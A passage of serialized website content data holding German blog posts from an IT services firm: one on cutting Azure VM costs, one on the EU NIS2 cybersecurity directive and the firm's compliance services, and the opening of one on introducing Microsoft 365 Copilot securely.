innerhalb derselben Serie die VM-Größe anzupassen.",[353,11082,11083,11086],{},[433,11084,11085],{},"Beispiel „Falsche SKU“","\nEin anderes Beispiel: Eine Anwendung benötigt 64 GB RAM, aber nur vier CPU-Kerne. Wurde die VM fälschlicherweise als Standard_D16s_v5 konfiguriert, sind damit auch 16 CPU-Kerne enthalten – weit über den Bedarf hinaus.",[353,11088,11089,11091],{},[433,11090,11079],{}," Der Wechsel auf eine SKU wie Standard_E8-4s_v5 würde dieselben 64 GB RAM bereitstellen, aber nur mit vier CPU-Kernen ausgestattet sein.",[353,11093,11094,11095,11100],{},"Ein Blick auf die Kosten im ",[374,11096,11099],{"href":11097,"rel":11098},"https://azure.microsoft.com/de-de/pricing/calculator/",[378],"Azure-Preisrechner"," zeigt hier schnell Einsparpotenziale: Der monatliche Unterschied kann bei über 450 Euro liegen.",[353,11102,11103],{},[356,11104],{"alt":11105,"src":11106},"VM Kostenvergleich","https://res.cloudinary.com/c4a8/image/upload/blog/pics/vm-cost-optimization.png",[629,11108,11110],{"id":11109},"optimierung-der-vm-laufzeit","Optimierung der VM-Laufzeit",[353,11112,10713],{},[353,11114,11115],{},"In der Cloud werden virtuelle Maschinen (VMs) basierend auf der genutzten CPU- und RAM-Leistung abgerechnet, solange sie aktiv sind. On-Premises waren VMs oft rund um die Uhr im Einsatz, da dies die Kosten kaum beeinflusste. In der Cloud hingegen stellt sich die Frage: Muss eine VM wirklich 24/7 laufen?",[353,11117,11118,11121],{},[433,11119,11120],{},"Beispiel: Nutzung 12/5","\nNehmen wir eine VM, deren Applikation nachts und an Wochenenden nicht genutzt wird. Eine durchgehende Verfügbarkeit ist hier nicht notwendig.",[353,11123,11124,11126],{},[433,11125,11079],{}," Ein simples, aber wirkungsvolles Mittel ist das planmäßige Abschalten der VM in Zeiten ohne Nutzung. Wichtig dabei: das Updatemanagement berücksichtigen, um Sicherheitsrisiken zu vermeiden. Mit Azure Automation Accounts lässt sich eine Automatisierung einrichten, die VMs zu festgelegten Zeiten startet und stoppt.",[353,11128,11129,11132],{},[433,11130,11131],{},"Beispiel: Nutzung 24/7","\nEinige Systeme, wie etwa Domain-Controller, müssen rund um die Uhr verfügbar sein, um Benutzern, Clients und Servern jederzeit zu antworten.",[353,11134,11135,11137,11138,11143],{},[433,11136,11079],{}," Für solche Fälle bieten sich ",[374,11139,11142],{"href":11140,"rel":11141},"https://azure.microsoft.com/de-de/pricing/reserved-vm-instances/?msockid=11c5d32a1e116e2101f6c6241ff16ff8",[378],"Azure Reserved Instances"," an. Hierbei reservieren Unternehmen für 1 bis 3 Jahre ein festes Kontingent an Rechenressourcen zu einem reduzierten Preis. Die Abrechnung kann monatlich oder als Vorauszahlung erfolgen. Ein Vorteil: Bei richtiger Konfiguration können Reserved Instances auch auf andere VMs der gleichen SKU angewendet werden, wenn diese verfügbar sind.",[353,11145,11146,11149],{},[433,11147,11148],{},"Beispiel: Modernisierung in Aussicht","\nEs gibt Situationen, in denen VMs noch benötigt werden, obwohl eine Modernisierung hin zu cloud-nativen Diensten wie Azure Functions oder Azure Kubernetes Clustern geplant ist. Wenn dieser Umstieg beispielsweise innerhalb von drei Monaten erfolgen soll, lohnt sich der Einsatz von Reserved Instances meist nicht.",[353,11151,11152,11154,11155,11160,11161,11166],{},[433,11153,11079],{}," Der ",[374,11156,11159],{"href":11157,"rel":11158},"https://learn.microsoft.com/de-de/azure/cost-management-billing/savings-plan/savings-plan-compute-overview",[378],"Azure Savings Plan"," ist hier eine flexible Alternative. Ähnlich wie bei Reserved Instances wählt man eine Laufzeit von 1 bis 3 Jahren, allerdings deckt der Savings Plan eine größere Bandbreite an ",[374,11162,11165],{"href":11163,"rel":11164},"https://azure.microsoft.com/en-us/pricing/offers/savings-plan-compute/#Select-services",[378],"Azure Services"," ab. Unternehmen verpflichten sich zur stündlichen Abnahme eines bestimmten Betrags, und alle berechtigten Services bis zu dieser Grenze profitieren von rabattierten Preisen. Kosten, die darüber hinausgehen, werden zu den regulären Tarifen abgerechnet.",[629,11168,11170],{"id":11169},"lizenzen","Lizenzen",[353,11172,10713],{},[353,11174,11175],{},"Ein oft unterschätzter Faktor bei der Kostenoptimierung sind Betriebssystemlizenzen. Wird eine VM in Azure erstellt, stellt Microsoft standardmäßig eine Mietlizenz für das Betriebssystem bereit. Viele Organisationen verfügen jedoch bereits über bestehende Lizenzen.",[353,11177,11178,11181,11182,11187],{},[433,11179,11180],{},"Lösung: Azure Hybrid Benefit","\nMit ",[374,11183,11186],{"href":11184,"rel":11185},"https://azure.microsoft.com/en-us/pricing/hybrid-benefit/?msockid=11c5d32a1e116e2101f6c6241ff16ff8#features",[378],"Azure Hybrid Benefit"," können bestehende Lizenzen, wie etwa für Windows Server, auch in Azure verwendet werden.",[353,11189,11190],{},[356,11191],{"alt":11192,"src":11193},"Azure Hybrid Benefit Windows Server","https://res.cloudinary.com/c4a8/image/upload/blog/pics/azure_hybrid_benefit_ms_picture_windows_server.png",[353,11195,11196],{},"Diese Option gibt es nicht nur für Windows-Betriebssysteme, sondern auch für lizenzpflichtige Systeme anderer Anbieter wie Red Hat oder SUSE Enterprise sowie für Microsoft SQL Server.",[353,11198,11199],{},"Die Nutzung vorhandener Lizenzen in Azure unterliegt bestimmten Bedingungen. Sind diese erfüllt, reicht ein einfacher Klick in den VM-Einstellungen, um den Hybrid Benefit zu aktivieren. Der Vorteil zeigt sich schnell: Ein Vergleich zwischen VMs mit und ohne aktivierten Hybrid Benefit verdeutlicht das Einsparpotenzial.",[353,11201,11202],{},[356,11203],{"alt":11186,"src":11204},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/azure-hybrid-benefit.png",[353,11206,11207],{},"Es lohnt sich also zu prüfen, ob bestehende Lizenzen für den Azure Hybrid Benefit genutzt werden können.",[2548,11209,1088],{"id":1087},[353,11211,11212],{},"Eine eingehende Analyse der Ressourcenzuordnung, gezielte Optimierungen der VM-Laufzeit sowie die Nutzung bestehender Lizenzen sind entscheidende Schritte zur Kostensenkung. Dabei lohnt es sich auch, Alternativen zu VMs zu prüfen und cloud-native Dienste zu erwägen. Tools wie der Azure-Preisrechner, Azure Automation und Optionen wie der Azure Hybrid Benefit helfen dabei, den Überblick zu behalten und Einsparpotenziale auszuschöpfen.",[353,11214,11215],{},"Wer in der Cloud langfristig erfolgreich sein möchte, sollte Kosten und Nutzen stets abwägen – und bereit sein, die Infrastruktur kontinuierlich zu hinterfragen und zu optimieren.",{"title":402,"searchDepth":403,"depth":403,"links":11217},[11218,11219,11220,11225],{"id":10979,"depth":403,"text":10980},{"id":11008,"depth":403,"text":11009},{"id":11050,"depth":403,"text":11051,"children":11221},[11222,11223,11224],{"id":11059,"depth":704,"text":11060},{"id":11109,"depth":704,"text":11110},{"id":11169,"depth":704,"text":11170},{"id":1087,"depth":403,"text":1088},{"seoTitle":11227,"titleClass":7896,"date":11228,"categories":11229,"blogtitlepic":11230,"socialimg":11231,"customExcerpt":11232,"keywords":11233,"hreflang":11234,"scripts":11239},"Azure-VM Kosten optimieren: Die besten Tipps und Strategien","2024-11-11",[1773],"head-vm-cost-optimization","/blog/heads/head-vm-cost-optimization.jpg","Virtuelle Maschinen (VMs) in Azure können teurer als erwartet sein, besonders ohne Optimierungen. In diesem Artikel erfährst du, wie du Kosten senken kannst, indem du die richtige VM-SKU wählst, Laufzeiten optimierst und bestehende Lizenzen clever nutzt. Mit den richtigen Strategien kannst du deine Cloud-Kosten langfristig effizienter gestalten.","Azure VM-Kosten, Cloud-Kostenoptimierung, virtuelle Maschinen, Azure SKU, Azure Hybrid Benefit, Cloud-native Dienste, Kostenoptimierung Azure, VM-Laufzeitoptimierung, Azure Reserved Instances, Azure Automation",[11235,11237],{"lang":2118,"href":11236},"/blog/azure/2024/11/vm-cost-optimization-on-azure-en",{"lang":9114,"href":11238},"/blog/azure/2024/11/vm-cost-optimization-on-azure-es",{"slick":415,"form":415},"/posts/2024-11-11-vm-cost-optimization-on-azure",{"title":10965,"description":10973},"posts/2024-11-11-vm-cost-optimization-on-azure",[11244,10458,11245],"Azure Automation","Azure Kostenoptimierung","HIqpQwSAEsmjtL9zmLziy5sBtFoZIDe-exkQcj7qWQc",{"id":11248,"title":11249,"author":11250,"body":11251,"cta":3,"description":11577,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":11578,"moment":11580,"navigation":415,"path":11603,"seo":11604,"stem":11605,"tags":11606,"webcast":406,"__hash__":11607},"content_de/posts/2024-11-25-nis2.md","NIS2 ist in Kraft, und jetzt?",[250],{"type":350,"value":11252,"toc":11567},[11253,11273,11282,11286,11288,11291,11306,11309,11324,11327,11336,11340,11342,11351,11360,11364,11366,11369,11378,11410,11413,11417,11419,11428,11431,11435,11437,11469,11478,11481,11484,11488,11490,11493,11496,11499,11503,11505,11514,11529,11538,11552,11556,11558,11561,11564],[353,11254,11255,11256,11260,11261,11266,11267,11272],{},"Im April 2024 haben wir einen Blogbeitrag von Jan Geisbauer zur ",[374,11257,11259],{"href":11258},"/de/blog/security/2024/04/nis2","NIS2-Richtlinie"," veröffentlicht. Die NIS2 verfolgt das Ziel, ein hohes, einheitliches Cybersicherheitsniveau in der Europäischen Union zu gewährleisten und die Cyber-Resilienz zu stärken. Regelmäßig berichten Medien über schwerwiegende Vorfälle, und sowohl der ",[374,11262,11265],{"href":11263,"rel":11264},"https://www.bsi.bund.de/DE/Service-Navi/Publikationen/Lagebericht/lagebericht_node.html",[378],"Bericht zur Lage der IT-Sicherheit"," in Deutschland des BSI als auch der ",[374,11268,11271],{"href":11269,"rel":11270},"https://www.microsoft.com/en-us/security/security-insider/intelligence-reports/microsoft-digital-defense-report-2024",[378],"Microsoft Digital Defense Report 2024"," verdeutlichen die aktuelle Bedrohungslage. Sie zeigen zudem auf, dass dringender Handlungsbedarf besteht, um die Cybersicherheit zu verbessern.",[353,11274,11275,11276,11281],{},"Seit dem 17. Oktober 2024 ist die NIS2-Richtlinie der EU offiziell in Kraft. Bis zu diesem Datum hätten alle europäischen Länder die geforderten Ziele in nationales Recht umsetzen müssen. Dies haben wir zum Anlass genommen, den Webcast ",[374,11277,11280],{"href":11278,"rel":11279},"https://youtu.be/7vU-emuROkE",[378],"\"NIS2 ist in Kraft – und jetzt?\""," zu veröffentlichen. In diesem Blogbeitrag möchten wir genauer darauf eingehen.",[2548,11283,11285],{"id":11284},"wie-ist-der-aktuelle-stand","Wie ist der aktuelle Stand?",[353,11287,9352],{},[353,11289,11290],{},"Wie die folgende Grafik zeigt, haben lediglich 6 der 27 Mitgliedstaaten rechtzeitig ein Umsetzungsgesetz veröffentlicht.",[353,11292,11293,11297],{},[356,11294],{"alt":11295,"src":11296},"NIS2-Umsetzung in der EU","https://res.cloudinary.com/c4a8/image/upload/blog/pics/nis2-umsetzung-eu.png",[748,11298,11299,11300,11305],{},"Abbildung 1: NIS2-Richtlinie: ",[374,11301,11304],{"href":11302,"rel":11303},"https://www.linkedin.com/posts/stefan-hessel-itsec_nis-2-richtlinie-umsetzung-in-europa-ugcPost-7252337957372674051-v-_z/",[378],"Aktueller Stand der Umsetzung in der EU"," von Stefan Hessel",[353,11307,11308],{},"In Deutschland gibt es einen Entwurf namens NIS-2-Umsetzungs- und Cybersicherheitsstärkungsgesetz (NIS2UmsuCG), der gemäß dem Zeitplan des Bundesministeriums des Innern und für Heimat (BMI) bis März 2025 in Kraft treten soll. Bis dahin besteht jedoch eine gewisse Rechtsunsicherheit.",[353,11310,11311,11315],{},[356,11312],{"alt":11313,"src":11314},"Zeitplan für Inkrafttreten des NIS2UmsuCG","https://res.cloudinary.com/c4a8/image/upload/blog/pics/nis2umsucg-zeitplan.png",[748,11316,11317,11318,11323],{},"Abbildung 2: Entwurf ",[374,11319,11322],{"href":11320,"rel":11321},"https://www.linkedin.com/posts/manuel-honkhase-atug-820b27241_nis2umsucg-inkrafttreten-kritis-activity-7242049653586743297-7foq?utm_source=share&utm_medium=member_desktop",[378],"Zeitplan"," vom Juli 2024 für das Inkrafttreten des NIS2UmsuCG",[353,11325,11326],{},"Die Risikomaßnahmen aus Artikel 21 der NIS2-Richtlinie entsprechen den Maßnahmen aus §30 des NIS2UmsuCG. Die darin enthaltenen, eher allgemein formulierten Cybersicherheitsmaßnahmen sind aus unserer Sicht für Unternehmen in allen Sektoren von Bedeutung.",[353,11328,11329,11333],{},[356,11330],{"alt":11331,"src":11332},"Risikomaßnahmen NIS2 und NIS2UmsuCG","https://res.cloudinary.com/c4a8/image/upload/blog/pics/nis2-risikoma%C3%9Fnahmen.png",[748,11334,11335],{},"Abbildung 3: Risikomaßnahmen NIS2 und NIS2UmsuCG",[2548,11337,11339],{"id":11338},"wie-kann-ich-prüfen-ob-mein-unternehmen-zur-umsetzung-der-risikomaßnahmen-verpflichtet-ist","Wie kann ich prüfen, ob mein Unternehmen zur Umsetzung der Risikomaßnahmen verpflichtet ist?",[353,11341,9352],{},[353,11343,11344,11345,11350],{},"Um zu prüfen, ob Ihr Unternehmen von der NIS2-Richtlinie betroffen ist, stellt das Bundesamt für Sicherheit in der Informationstechnik (BSI) ein ",[374,11346,11349],{"href":11347,"rel":11348},"https://www.bsi.bund.de/DE/Themen/Regulierte-Wirtschaft/NIS-2-regulierte-Unternehmen/NIS-2-Betroffenheitspruefung/nis-2-betroffenheitspruefung_node.html",[378],"NIS2-Betroffenheitsprüfung-Tool"," zur Verfügung. Da auch die Sicherheit der Lieferkette – insbesondere bei direkten Lieferanten oder Dienstleistern – gewährleistet werden muss, können die Maßnahmen selbst dann relevant werden, wenn Ihr Unternehmen nicht direkt in einen der definierten Sektoren fällt. Bei Unsicherheiten darüber, ob Sie registrierungs- und meldepflichtig sind, empfiehlt es sich, juristischen Rat einzuholen.",[353,11352,11353,11357],{},[356,11354],{"alt":11355,"src":11356},"Betroffene Sektoren von NIS2","https://res.cloudinary.com/c4a8/image/upload/blog/pics/nis2-sektoren.png",[748,11358,11359],{},"Abbildung 4: Betroffene Sektoren von NIS2",[2548,11361,11363],{"id":11362},"ist-glueckkanja-von-nis2-betroffen","Ist glueckkanja von NIS2 betroffen?",[353,11365,9352],{},[353,11367,11368],{},"glueckkanja wird gemäß Anlage 1 des NIS2UmsuCG dem Sektor 'Digitale Infrastruktur' zugeordnet und ist sowohl als Managed Service Provider als auch als Managed Security Service Provider tätig. Aufgrund dieser Einstufung gilt das Unternehmen als besonders wichtige Einrichtung.",[353,11370,11371,11372,11377],{},"Am 17. Oktober 2024 hat die EU-Kommission neben der NIS2-Richtlinie auch eine ",[374,11373,11376],{"href":11374,"rel":11375},"https://ec.europa.eu/info/law/better-regulation/have-your-say/initiatives/14241-Cybersecurity-risk-management-reporting-obligations-for-digital-infrastructure-providers-and-ICT-service-managers_en",[378],"Durchführungsverordnung zur Richtlinie (EU) 2022/2555"," veröffentlicht, die sich auf die technischen und methodischen Anforderungen der Risikomanagementmaßnahmen bezieht. Diese Verordnung ist für die folgenden Sektoren verbindlich:",[367,11379,11380,11383,11386,11389,11392,11395,11398,11401,11404,11407],{},[370,11381,11382],{},"DNS-Diensteanbieter (DNS service providers)",[370,11384,11385],{},"TLD-Namenregister (TLD name registries),",[370,11387,11388],{},"Anbieter von Cloud-Computing-Diensten (cloud computing service providers),",[370,11390,11391],{},"Anbieter von Rechenzentrumsdiensten (data center service providers),",[370,11393,11394],{},"Betreiber von Inhaltszustellnetzen (content delivery network providers),",[370,11396,11397],{},"Anbieter verwalteter Dienste (managed service providers),",[370,11399,11400],{},"Anbieter verwalteter Sicherheitsdienste (managed security service providers),",[370,11402,11403],{},"Anbieter von Online-Marktplätzen (providers of online market places) und Online-Suchmaschinen (online search engines),",[370,11405,11406],{},"Plattformen für Dienste sozialer Netzwerke (social networking services platforms ) und",[370,11408,11409],{},"Vertrauensdiensteanbieter (trust service providers)",[353,11411,11412],{},"Die in der Verordnung beschriebenen Maßnahmen basieren auf internationalen Normen wie ISO/IEC 27001 und ISO/IEC 27002. Darüber hinaus werden Kriterien festgelegt, die erfüllt sein müssen, um einen erheblichen Sicherheitsvorfall meldepflichtig zu machen. Somit dient diese Verordnung nicht nur den betroffenen Sektoren als wertvolles Nachschlagewerk.",[2548,11414,11416],{"id":11415},"wie-hat-glueckkanja-die-nis2-anforderungen-umgesetzt","Wie hat glueckkanja die NIS2-Anforderungen umgesetzt?",[353,11418,9352],{},[353,11420,11421,11422,11427],{},"Seit 2021 verfügt glueckkanja über ein nach ISO/IEC 27001 zertifiziertes Informationssicherheitsmanagementsystem (ISMS), das jährlich durch interne und externe Audits überprüft wird und einem kontinuierlichen Verbesserungsprozess unterliegt. Zur Dokumentation haben wir die Anforderungen der NIS2-Richtlinie und der ISO/IEC 27001 tabellarisch gegenübergestellt. Ein Mapping der Maßnahmen ist auch online bspw. bei ",[374,11423,11426],{"href":11424,"rel":11425},"https://www.openkritis.de/massnahmen/nis2-mapping-standards-implementing.html",[378],"OpenKRITIS"," verfügbar. Bereits jetzt gibt es eine weitreichende Abdeckung der Maßnahmen. Mit den Umsetzungsempfehlungen aus der ISO/IEC 27001 und der Umsetzungsverordnung der EU Kommission, werden wir die Maßnahmen weiter verbessern. Darüber hinaus lassen wir unsere NIS2-Maßnahmen im Rahmen der jährlichen Audits durch unabhängige Dritte prüfen, um Non-Konformitäten und Verbesserungspotenziale frühzeitig zu identifizieren.",[353,11429,11430],{},"Bei glueckkanja setzen wir konsequent auf einen Cloud-Only-Ansatz und nutzen unsere Expertise in Infrastructure-as-Code, um die Maßnahmen effizient umzusetzen. Als Microsoft-Partner setzen wir dabei auf Microsoft-Technologien und verfolgen einen Blueprint-basierten Ansatz. Die Services, die wir für unsere Kunden anbieten, wie das CSOC oder AzERE, verwenden wir auch intern, beispielsweise zur Verarbeitung von Incidents.",[2548,11432,11434],{"id":11433},"wie-können-wir-sie-dabei-unterstützen-die-maßnahmen-zu-erfüllen","Wie können wir Sie dabei unterstützen, die Maßnahmen zu erfüllen?",[353,11436,9352],{},[353,11438,11439,11440,2454,11442,2454,11446,2454,11450,2454,11454,2454,11457,2454,11461,993,11465,11468],{},"Mit unseren Managed Services – darunter ",[374,11441,6409],{"href":8529},[374,11443,11445],{"href":11444},"/de/security/are-you-under-attack","APT Response",[374,11447,11449],{"href":11448},"/de/security/preventive-services","Preventive Services",[374,11451,11453],{"href":11452},"/de/security/managed-red-tenant","Managed Red Tenant",[374,11455,10020],{"href":11456},"/de/azure/azure-emergency-response-environment",[374,11458,11460],{"href":11459},"/de/security/data-security-service","Data Security Service",[374,11462,11464],{"href":11463},"/de/workplace/managed-workplace","Managed Workplace",[374,11466,11165],{"href":11467},"/de/azure/azure-foundation"," – unterstützen wir Sie dabei, die Anforderungen der NIS2-Cybersicherheitsmaßnahmen zu erfüllen. In unserem Webcast und anhand der folgenden Tabelle zeigen wir, wie wir mithilfe von Microsoft-Technologien die jeweiligen Maßnahmen umsetzen:",[353,11470,11471,11475],{},[356,11472],{"alt":11473,"src":11474},"Zuordnung der Managed Services zu NIS2","https://res.cloudinary.com/c4a8/image/upload/blog/pics/nis2-managed-services.png",[748,11476,11477],{},"Abbildung 5: Zuordnung der glueckkanja Managed Services zu den NIS2-Risikomaßnahmen",[353,11479,11480],{},"Durch unser CSOC – den Managed Extended Detection and Response (MXDR) Service von glueckkanja – übernehmen wir das Incident Handling in einem 24/7/365-Betrieb. Dieser Service basiert auf der Microsoft Security Plattform und ermöglicht proaktives Hunting, Monitoring und Incident Response gemäß vertraglich geregelten SLAs. Ein zentrales Dashboard und festgelegte KPIs sorgen dafür, dass die Effektivität der Cybersicherheitsmaßnahmen kontinuierlich überwacht wird. In monatlichen Meetings werden empfohlene Verbesserungen gemeinsam mit IT-Sicherheitsverantwortlichen besprochen, um die Awareness für relevante Risiken zu schärfen.",[353,11482,11483],{},"Indem interne und externe Identitäten, Endgeräte, Schwachstellen sowie Kommunikationskanäle (z. B. E-Mail und Teams) überwacht werden, hilft der Service auch dabei, Angriffe innerhalb der Lieferkette frühzeitig zu erkennen und zu verhindern. Zusätzlich arbeiten wir daran, Prozesse zu implementieren, um unsere Kunden bei meldepflichtigen NIS2-Incidents bestmöglich zu unterstützen.",[2548,11485,11487],{"id":11486},"wofür-können-wir-keine-verantwortung-übernehmen","Wofür können wir keine Verantwortung übernehmen?",[353,11489,9352],{},[353,11491,11492],{},"Wir selbst setzen ein ISMS nach ISO/IEC 27001 ein, um mit einem risikobasierten Ansatz gemäß international anerkanntem Standard vorzugehen. Dennoch liegt es in der Verantwortung des jeweiligen Unternehmens, ein eigenes Risikomanagement zu betreiben, notwendige Dokumentationen wie Richtlinien zu erstellen sowie Rollen und Verantwortlichkeiten klar festzulegen. Damit diese Maßnahmen effektiv umgesetzt werden können, ist eine klare Unterstützung durch das Management essenziell.",[353,11494,11495],{},"Mit unseren Lösungen wie AzERE und APT Response unterstützen wir Unternehmen dabei, nach einem schwerwiegenden IT-Sicherheitsvorfall möglichst schnell wieder in den Normalbetrieb zurückzukehren. Dennoch ist es entscheidend, dass Unternehmen selbst Vorbereitungen in den Bereichen Business Continuity Management (BCM), Notfallpläne, Business Impact Analyse und Krisenmanagement treffen. Diese Maßnahmen sorgen dafür, dass die verantwortlichen Mitarbeiter im Ernstfall schnell und effektiv handeln können.",[353,11497,11498],{},"Darüber hinaus müssen Unternehmen Strategien entwickeln, um die Einhaltung von Anforderungen entlang der Lieferkette, beispielsweise durch vertragliche Vereinbarungen, sicherzustellen. Ebenso sollten Themen wie physische Sicherheit, die Awareness des Managements und der Mitarbeitenden sowie Personalprozesse im Hinblick auf die Anforderungen der NIS2-Richtlinie überprüft und gegebenenfalls angepasst werden.",[2548,11500,11502],{"id":11501},"wie-helfen-microsoft-technologien","Wie helfen Microsoft Technologien?",[353,11504,9352],{},[353,11506,11507,11508,11513],{},"Microsoft unterstützt seine Kunden mit Infrastruktur und Technologien bei der Einhaltung der europäischen Richtlinien. Dafür hat das Unternehmen eine ",[374,11509,11512],{"href":11510,"rel":11511},"https://aka.ms/nis2-readiness",[378],"Lern-Kampagne"," gestartet, die Kunden und Partnern durch Webinare und umfangreiche Informationen einen einfachen Einstieg ermöglicht. Dort findet man bspw. eine Zuordnung der NIS2-Prinzipien zu den Microsoft-Produkten sowie Hinweise darauf, welche Lizenzen für die Umsetzung erforderlich sind.",[353,11515,11516,11520],{},[356,11517],{"alt":11518,"src":11519},"NIS2-Prinzipien","https://res.cloudinary.com/c4a8/image/upload/blog/pics/nis2-prinzipien.png",[748,11521,11522,11523,11528],{},"Abbildung 6: Auszug ",[374,11524,11527],{"href":11525,"rel":11526},"https://assetsprod.microsoft.com/mpn/en-us/nis2-x-microsoft-security-technology-map.xlsx",[378],"Zuordnung der NIS2-Prinzipien"," zu den Microsoft-Sicherheitstechnologie",[353,11530,11531,11532,11537],{},"Mit dem Microsoft Zero Trust Model bietet Microsoft einen Sicherheitsansatz, der darauf abzielt, Ressourcen innerhalb einer Infrastruktur umfassend zu schützen. Die folgende Abbildung zeigt, wie die Risikomaßnahmen mit den entsprechenden Bausteinen des Zero Trust Models verknüpft werden können. In der dazugehörigen ",[374,11533,11536],{"href":11534,"rel":11535},"https://assetsprod.microsoft.com/mpn/en-us/nis2-technology-mapping-to-microsoft-security-solutions.pdf",[378],"Präsentation"," erläutern Microsoft-Mitarbeitende, wie die Maßnahmen mithilfe der eingesetzten Technologien eingehalten werden können.",[353,11539,11540,11544],{},[356,11541],{"alt":11542,"src":11543},"Zuordnung NIS2-Risikomaßnahmen zum Microsoft Zero Trust Modell","https://res.cloudinary.com/c4a8/image/upload/blog/pics/nis2-risikomassnahmen-zero-trust.png",[748,11545,11546,11547,11551],{},"Abbildung 7: Zuordnung ",[374,11548,11550],{"href":11534,"rel":11549},[378],"NIS2 Risikomaßnahmen"," zum Microsoft Zero Trust Modell",[2548,11553,11555],{"id":11554},"die-nis2-ist-in-kraft-was-können-sie-als-unternehmen-jetzt-tun","Die NIS2 ist in Kraft: Was können Sie als Unternehmen jetzt tun?",[353,11557,9352],{},[353,11559,11560],{},"Obwohl das NIS2UmsuCG nicht fristgerecht in Kraft getreten ist und voraussichtlich erst Mitte 2025 vollständig umgesetzt wird, empfehlen wir Ihnen, nicht abzuwarten und bereits jetzt mit der Umsetzung der Maßnahmen zu beginnen.",[353,11562,11563],{},"Die Unternehmensleitung trägt die Verantwortung für das Risikomanagement. Die NIS2-Richtlinie sieht vor, dass eine Nicht-Einhaltung der Maßnahmen Management-Haftung und Bußgelder nach sich ziehen kann. Ein erster Schritt sollte darin bestehen, zuständige Personen zu benennen, die eine Bestandsaufnahme sowie eine Gap-Analyse durchführen. So lassen sich Bereiche identifizieren, in denen Handlungsbedarf besteht, und notwendige Maßnahmen können gezielt und kontinuierlich umgesetzt werden.",[353,11565,11566],{},"Wenn es darum geht, die Anforderungen mit Microsoft-Technologien zu erfüllen, unterstützen wir Sie gerne mit unseren Managed & Professional Services sowie unseren Produkten.",{"title":402,"searchDepth":403,"depth":403,"links":11568},[11569,11570,11571,11572,11573,11574,11575,11576],{"id":11284,"depth":403,"text":11285},{"id":11338,"depth":403,"text":11339},{"id":11362,"depth":403,"text":11363},{"id":11415,"depth":403,"text":11416},{"id":11433,"depth":403,"text":11434},{"id":11486,"depth":403,"text":11487},{"id":11501,"depth":403,"text":11502},{"id":11554,"depth":403,"text":11555},"Im April 2024 haben wir einen Blogbeitrag von Jan Geisbauer zur NIS2-Richtlinie veröffentlicht. Die NIS2 verfolgt das Ziel, ein hohes, einheitliches Cybersicherheitsniveau in der Europäischen Union zu gewährleisten und die Cyber-Resilienz zu stärken. Regelmäßig berichten Medien über schwerwiegende Vorfälle, und sowohl der Bericht zur Lage der IT-Sicherheit in Deutschland des BSI als auch der Microsoft Digital Defense Report 2024 verdeutlichen die aktuelle Bedrohungslage. Sie zeigen zudem auf, dass dringender Handlungsbedarf besteht, um die Cybersicherheit zu verbessern.",{"seoTitle":11579,"titleClass":7896,"date":11580,"categories":11581,"blogtitlepic":11582,"socialimg":11583,"customExcerpt":11584,"keywords":11585,"contactInContent":11586,"scripts":11602},"NIS2 ist in Kraft: Was Unternehmen jetzt tun müssen","2024-11-25",[1117],"head-nis2-in-force","/blog/heads/head-nis2-in-force.png","Die NIS2-Richtlinie ist offiziell in Kraft getreten – doch was bedeutet das für Unternehmen? Jetzt ist der richtige Zeitpunkt, aktiv zu werden: Risiken identifizieren, Lücken schließen und Maßnahmen zur Cybersicherheit umsetzen. Mit unseren Managed Services und Microsoft-Technologien unterstützen wir Sie dabei, Ihre IT-Sicherheit zukunftssicher zu gestalten.","NIS2, NIS2 Richtlinie, IT-Sicherheit, Cybersicherheit, Risiko-Management, Compliance, EU-Richtlinie, Unternehmen, Maßnahmen umsetzen, IT-Sicherheitsgesetz",{"quote":415,"infos":11587},{"headline":9487,"subline":9488,"level":2548,"textStyling":9489,"flush":9490,"person":11588,"form":11592},{"image":9327,"mail":9492,"number":9493,"cloudinary":415,"alt":164,"name":164,"quotee":164,"quoteeTitle":9494,"quote":9495,"detailsHeader":9496,"details":11589},[11590,11591],{"text":9499,"href":9500,"details":9501,"icon":9502},{"text":9504,"href":9505,"icon":9506},{"ctaText":9508,"cta":11593,"method":407,"action":9511,"fields":11594},{"skin":9510},[11595,11596,11597,11598,11599,11600,11601],{"label":9514,"type":3722,"id":9515,"required":415,"requiredMsg":9516},{"label":9518,"type":3722,"id":9519,"required":415,"requiredMsg":9520},{"label":9522,"type":9523,"id":9523,"required":415,"requiredMsg":9524},{"label":9526,"type":9527,"id":9528,"required":415,"requiredMsg":9529},{"type":9531,"id":9532,"value":9533},{"type":9531,"id":9535,"value":9536},{"type":9531,"id":9538},{"slick":415,"form":415},"/posts/2024-11-25-nis2",{"title":11249,"description":11577},"posts/2024-11-25-nis2",[9543,1117,9544,9545],"7UwIsb0pGG2ju38Wi4UJ4OYR3-e-PHy9iq_sArt3jCI",{"id":11609,"title":11610,"author":11611,"body":11612,"cta":3,"description":402,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":12118,"moment":12120,"navigation":415,"path":12153,"seo":12154,"stem":12155,"tags":12156,"webcast":406,"__hash__":12160},"content_de/posts/2025-01-09-microsoft-365-copilot.md","Microsoft 365 Copilot sicher einführen: Das müsst ihr wissen",[255],{"type":350,"value":11613,"toc":12088},[11614,11617,11619,11651,11654,11656,11659,11663,11665,11668,11671,11675,11677,11680,11683,11687,11689,11692,11696,11698,11701,11704,11706,11709,11713,11715,11718,11721,11728,11731,11734,11736,11739,11744,11791,11794,11796,11799,11802,11804,11851,11854,11856,11859,11867,11870,11872,11875,11879,11881,11884,11887,11891,11893,11896,11901,11904,11907,11911,11913,11916,11919,11921,11924,11963,11966,11968,11971,11977,11980,11983,11985,11988,11996,11999,12002,12004,12007,12010,12013,12057,12060,12062,12065,12068],[2548,11615,4587],{"id":11616},"übersicht",[353,11618,9352],{},[367,11620,11621,11627,11633,11639,11645],{},[370,11622,11623],{},[374,11624,11626],{"href":11625},"#oversharing-kennen--kontrollieren","Oversharing kennen & kontrollieren",[370,11628,11629],{},[374,11630,11632],{"href":11631},"#sharepoint-advanced-management","SharePoint Advanced Management",[370,11634,11635],{},[374,11636,11638],{"href":11637},"#grundlegende-sicherheit-im-tenant-herstellen","Grundlegende Sicherheit im Tenant herstellen",[370,11640,11641],{},[374,11642,11644],{"href":11643},"#aktualisierung-der-office-applikationen","Aktualisierung der Office-Applikationen",[370,11646,11647],{},[374,11648,11650],{"href":11649},"#datenschutz--datensicherheit","Datenschutz & Datensicherheit",[2548,11652,11626],{"id":11653},"oversharing-kennen-kontrollieren",[353,11655,9352],{},[353,11657,11658],{},"Der Begriff \"Oversharing\" wird in den letzten Monaten oft verwendet, doch was bedeutet er im 